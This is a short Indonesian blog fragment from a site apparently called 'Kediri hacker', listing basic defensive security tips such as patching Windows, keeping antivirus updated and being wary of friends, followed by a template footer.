2. Patch Windows anda.
3. Gunakan antivirus dengan update terbaru
4. Hati2 terhadap teman anda sendiri.. waspadalah!!

Read More..
Kediri hacker © 2008 Template by:
SkinCorner